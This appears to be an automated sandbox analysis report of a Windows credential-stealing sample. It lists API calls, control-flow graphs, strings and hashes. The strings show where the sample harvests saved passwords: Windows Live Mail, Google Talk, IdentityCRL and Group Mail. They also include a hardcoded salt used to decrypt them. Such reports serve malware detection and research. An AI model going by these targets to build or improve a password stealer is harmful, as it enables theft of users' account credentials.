                                                                                                                          • String ID: h4ND

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                          • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0044430B
                                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                          • memset.MSVCRT ref: 00444379
                                                                                                                          • memset.MSVCRT ref: 00444394
                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                          • strlen.MSVCRT ref: 004443DB
                                                                                                                          • _strcmpi.MSVCRT ref: 00444401
                                                                                                                          Strings
                                                                                                                          • Store Root, xrefs: 004443A5
                                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                          • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                          • API String ID: 832325562-2578778931

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F567
                                                                                                                          • memset.MSVCRT ref: 0040F57F
                                                                                                                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2012582556-3916222277

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004037EB
                                                                                                                          • memset.MSVCRT ref: 004037FF
                                                                                                                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                          • strchr.MSVCRT ref: 0040386E
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                          • strlen.MSVCRT ref: 00403897
                                                                                                                          • sprintf.MSVCRT ref: 004038B7
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                          • API String ID: 317221925-3288273942

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403504
                                                                                                                          • memset.MSVCRT ref: 0040351A
                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                          • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                          • _mbscat.MSVCRT ref: 0040356D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                          • API String ID: 3071782539-966475738

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 364 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->364 365 40cd59-40cd60 DeleteObject 363->365 365->364
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                          • memset.MSVCRT ref: 0040CD96
                                                                                                                          • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2054149589-0

                                                                                                                          Control-flow Graph

                                                                                                                          control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 385 44b48d 375->385 386 44b428-44b433 GetProcAddress 375->386 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 384 44b471-44b474 383->384 384->377 388 44b476-44b478 384->388 389 44b48e-44b496 385->389 386->374 387 44b435-44b442 VirtualProtect 386->387 390 44b454 387->390 391 44b444-44b452 VirtualProtect 387->391 392 44b47e-44b486 388->392 393 44b47a-44b47c 388->393 395 44b498 389->395 390->374 391->390 396 44b487-44b488 GetProcAddress 392->396 393->396 395->384 396->385
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                            • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                            • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                          • memset.MSVCRT ref: 00408620
                                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                          • memset.MSVCRT ref: 00408671
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                          Strings
                                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                                          • API String ID: 1366857005-1079885057
                                                                                                                          • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                          • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                                          • String ID: /nosort$/sort
                                                                                                                          • API String ID: 882979914-1578091866
                                                                                                                          • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                          • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                            • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                            • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                            • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                          APIs
                                                                                                                          • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                          • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2152742572-0
                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,74DF0A60,?,00000000), ref: 00410D1C
                                                                                                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                          • memset.MSVCRT ref: 00410E10
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                          • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                          Strings
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                          • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                          • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3473537107-0
                                                                                                                          • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                          • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                          • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                          • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004109F7
                                                                                                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                            • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                          • memset.MSVCRT ref: 00410A32
                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3143880245-0
                                                                                                                          • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                          • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
